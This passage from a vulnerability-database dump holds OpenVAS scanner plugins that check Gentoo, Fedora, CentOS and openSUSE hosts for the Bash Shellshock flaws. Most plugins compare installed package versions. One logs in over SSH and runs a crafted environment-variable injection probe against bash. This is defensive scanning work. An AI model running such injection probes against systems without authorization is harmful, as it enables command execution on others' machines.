"CVE-2014-6271"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310121273", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121273", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201409-10.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), 
as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121273\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:27:55 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201409-10\");\n script_tag(name:\"insight\", value:\"Stephane Chazelas reported that Bash incorrectly handles function definitions, allowing attackers to inject arbitrary code (CVE-2014-6271). 
Gentoo Linux informed about this issue in GLSA 201409-09.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201409-10\");\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201409-10\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"app-shells/bash\", unaffected: make_list(\"ge 3.1_p18-r1\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"app-shells/bash\", unaffected: make_list(\"ge 3.2_p52-r1\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"app-shells/bash\", unaffected: make_list(\"ge 4.0_p39-r1\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"app-shells/bash\", unaffected: make_list(\"ge 4.1_p12-r1\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"app-shells/bash\", unaffected: make_list(\"ge 4.2_p48-r1\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"app-shells/bash\", unaffected: make_list(), vulnerable: make_list(\"lt 4.2_p48-r1\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 
10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:38", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "openvas", "title": "Fedora Update for bash FEDORA-2014-11514", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310868211", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868211", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for bash FEDORA-2014-11514\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868211\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 16:58:18 +0530 (Wed, 01 Oct 2014)\");\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Update for bash FEDORA-2014-11514\");\n script_tag(name:\"affected\", value:\"bash on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-11514\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-September/138679.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = 
isrpmvuln(pkg:\"bash\", rpm:\"bash~4.2.48~2.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:47", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "openvas", "title": "CentOS Update for bash CESA-2014:1306 centos7", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310882032", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882032", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for bash CESA-2014:1306 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882032\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 16:59:55 +0530 (Wed, 01 Oct 2014)\");\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Update for bash CESA-2014:1306 centos7\");\n script_tag(name:\"insight\", value:\"The GNU Bourne Again shell (Bash) is a shell and command language\ninterpreter compatible with the Bourne shell (sh). Bash is the default\nshell for Red Hat Enterprise Linux.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash still\nallowed certain characters to be injected into other environments via\nspecially crafted environment variables. An attacker could potentially use\nthis flaw to override or bypass environment restrictions to execute shell\ncommands. Certain services and applications allow remote unauthenticated\nattackers to provide environment variables, allowing them to exploit this\nissue. (CVE-2014-7169)\n\nApplications which directly create bash functions as environment variables\nneed to be made aware of changes to the way names are handled by this\nupdate. 
For more information see the Knowledgebase article at the linked references.\n\nNote: Docker users are advised to use 'yum update' within their containers,\nand to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer to the\naforementioned Knowledgebase article.\n\nAll bash users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\");\n script_tag(name:\"affected\", value:\"bash on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"CESA\", value:\"2014:1306\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2014-September/020592.html\");\n script_xref(name:\"URL\", value:\"https://access.redhat.com/articles/1200223\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.2.45~5.el7_0.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~4.2.45~5.el7_0.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:34", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "openvas", "title": "Fedora Update for bash FEDORA-2014-11527", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310868208", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868208", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for bash FEDORA-2014-11527\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868208\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 16:59:50 +0530 (Wed, 01 Oct 2014)\");\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Update for bash FEDORA-2014-11527\");\n script_tag(name:\"affected\", value:\"bash on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-11527\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-September/138687.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = 
isrpmvuln(pkg:\"bash\", rpm:\"bash~4.2.48~2.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:19", "description": "This host is installed with GNU Bash Shell\n and is prone to remote command execution vulnerability.", "cvss3": {}, "published": "2014-10-08T00:00:00", "type": "openvas", "title": "GNU Bash Environment Variable Handling Shell RCE Vulnerability (LSC) - 04", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6277", "CVE-2014-6271"], "modified": "2018-11-27T00:00:00", "id": "OPENVAS:1361412562310802086", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802086", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_bash_shellshock_credential_cmd_exec_vuln_04.nasl 12551 2018-11-27 14:35:38Z cfischer $\n#\n# GNU Bash Environment Variable Handling Shell RCE Vulnerability (LSC) - 04\n#\n# Authors:\n# Veerendra GG <veerendragg@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:gnu:bash\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802086\");\n script_version(\"$Revision: 12551 $\");\n script_cve_id(\"CVE-2014-6277\");\n script_bugtraq_id(70165);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-27 15:35:38 +0100 (Tue, 27 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-08 12:11:49 +0530 (Wed, 08 Oct 2014)\");\n script_name(\"GNU Bash Environment Variable Handling Shell RCE Vulnerability (LSC) - 04\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_gnu_bash_detect_lin.nasl\");\n script_mandatory_keys(\"bash/linux/detected\");\n script_exclude_keys(\"ssh/force/pty\");\n\n script_xref(name:\"URL\", value:\"https://shellshocker.net\");\n script_xref(name:\"URL\", value:\"http://lcamtuf.blogspot.in/2014/09/bash-bug-apply-unofficial-patch-now.html\");\n script_xref(name:\"URL\", value:\"https://ftp.gnu.org/gnu/bash/\");\n\n script_tag(name:\"summary\", value:\"This host is installed with GNU Bash Shell\n and is prone to remote command execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Login to the target machine with ssh\n credentials and check its possible to execute the commands via GNU bash shell.\");\n\n script_tag(name:\"insight\", value:\"GNU bash contains a flaw that is triggered\n when evaluating environment variables passed from another environment.\n After processing a 
function definition, bash continues to process trailing\n strings. Incomplete fix to CVE-2014-7169, CVE-2014-6271\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n or local attackers to inject shell commands, allowing local privilege\n escalation or remote command execution depending on the application vector.\");\n\n script_tag(name:\"affected\", value:\"GNU Bash through 4.3 bash43-026\");\n\n script_tag(name:\"solution\", value:\"Apply the patch from the referenced advisory.\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"ssh_func.inc\");\ninclude(\"host_details.inc\");\n\nif( get_kb_item( \"ssh/force/pty\" ) ) exit( 0 );\n\nif( isnull( port = get_app_port( cpe:CPE, service:\"ssh-login\" ) ) ) exit( 0 );\nif( ! bin = get_app_location( cpe:CPE, port:port ) ) exit( 0 ); # Returns e.g. \"/bin/bash\" or \"unknown\" (if the location of the binary wasn't detected).\n\nsock = ssh_login_or_reuse_connection();\nif( ! 
sock ) exit( 0 );\n\nif( bin == \"unknown\" )\n bash_cmd = \"bash\";\nelse if( bin =~ \"^/.*bash$\" )\n bash_cmd = bin;\nelse\n exit( 0 ); # Safeguard if something is broken in the bash detection\n\n# echo \"vt_test='() { x() { _;}; x() { _;} <<a; }' /bin/bash -c date 2>/dev/null || echo CVE-2014-6277 vulnerable\" | /bin/bash\ncmd = 'echo \"' + \"vt_test='() { x() { _;}; x() { _;} <<a; }' \" + bash_cmd + \" -c date 2>/dev/null || echo CVE-2014-6277 vulnerable\" + '\" | ' + bash_cmd;\n\nresult = ssh_cmd( socket:sock, cmd:cmd, nosh:TRUE );\nclose( sock );\n\nif( \"Unsupported use of\" >< result ) exit( 99 );\n\nif( \"CVE-2014-6277 vulnerable\" >< result ) {\n report = \"Used command: \" + cmd + '\\n\\nResult: ' + result;\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-07T16:39:05", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-09-18T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for bash (openSUSE-SU-2014:1254-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "modified": "2020-04-02T00:00:00", "id": "OPENVAS:1361412562310850676", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850676", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied 
warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850676\");\n script_version(\"2020-04-02T11:36:28+0000\");\n script_tag(name:\"deprecated\", value:TRUE);\n script_tag(name:\"last_modification\", value:\"2020-04-02 11:36:28 +0000 (Thu, 02 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-09-18 10:31:31 +0200 (Fri, 18 Sep 2015)\");\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for bash (openSUSE-SU-2014:1254-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\n\n This NVT has been deprecated because no proper information available\n from advisory link.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"bash was updated to fix command injection via environment variables.\n (CVE-2014-6271, CVE-2014-7169)\n\n Also a hardening patch was applied that only imports functions over\n BASH_FUNC_ prefixed environment variables.\n\n Also fixed: CVE-2014-7186, CVE-2014-7187: bad handling of HERE documents\n and for loop issue\");\n\n script_tag(name:\"affected\", value:\"bash on openSUSE 13.2\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"openSUSE-SU\", value:\"2014:1254-1\");\n 
script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n\n exit(0);\n}\n\nexit(66); ## This NVT is deprecated as proper information is not available in advisory. There is also no bash~4.2~75.4.1 on opensuse. the complete NVT is wrong.\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:39:44", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for bash (openSUSE-SU-2014:1242-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310850616", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850616", "sourceData": "# Copyright (C) 2014 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850616\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 16:59:10 +0530 (Wed, 01 Oct 2014)\");\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\", \"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"openSUSE: Security Advisory for bash (openSUSE-SU-2014:1242-1)\");\n\n script_tag(name:\"insight\", value:\"The command-line shell 'bash' evaluates environment variables, which\n allows the injection of characters and might be used to access files on\n the system in some circumstances (CVE-2014-7169).\n\n Please note that this issue is different from a previously fixed\n vulnerability tracked under CVE-2014-6271 and it is less serious due to\n the special, non-default system configuration that is needed to create an\n exploitable situation.\n\n To remove further exploitation potential we now limit the\n function-in-environment variable to variables prefixed with BASH_FUNC_ .\n This hardening feature is work in progress and might be improved in later\n updates.\n\n Additionally two more security issues were fixed in bash: CVE-2014-7186:\n Nested HERE documents could lead to a crash of bash.\n\n CVE-2014-7187: Nesting of for loops could lead to a crash of bash.\");\n\n script_tag(name:\"affected\", value:\"bash on openSUSE 13.1\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if 
a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2014:1242-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE13\\.1\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE13.1\") {\n if(!isnull(res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-debuginfo\", rpm:\"bash-debuginfo~4.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-debugsource\", rpm:\"bash-debugsource~4.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-devel\", rpm:\"bash-devel~4.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-loadables\", rpm:\"bash-loadables~4.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-loadables-debuginfo\", rpm:\"bash-loadables-debuginfo~4.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline6\", rpm:\"libreadline6~6.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline6-debuginfo\", rpm:\"libreadline6-debuginfo~6.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += 
res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"readline-devel\", rpm:\"readline-devel~6.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-debuginfo-32bit\", rpm:\"bash-debuginfo-32bit~4.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline6-32bit\", rpm:\"libreadline6-32bit~6.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline6-debuginfo-32bit\", rpm:\"libreadline6-debuginfo-32bit~6.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"readline-devel-32bit\", rpm:\"readline-devel-32bit~6.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~4.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-lang\", rpm:\"bash-lang~4.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"readline-doc\", rpm:\"readline-doc~6.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": 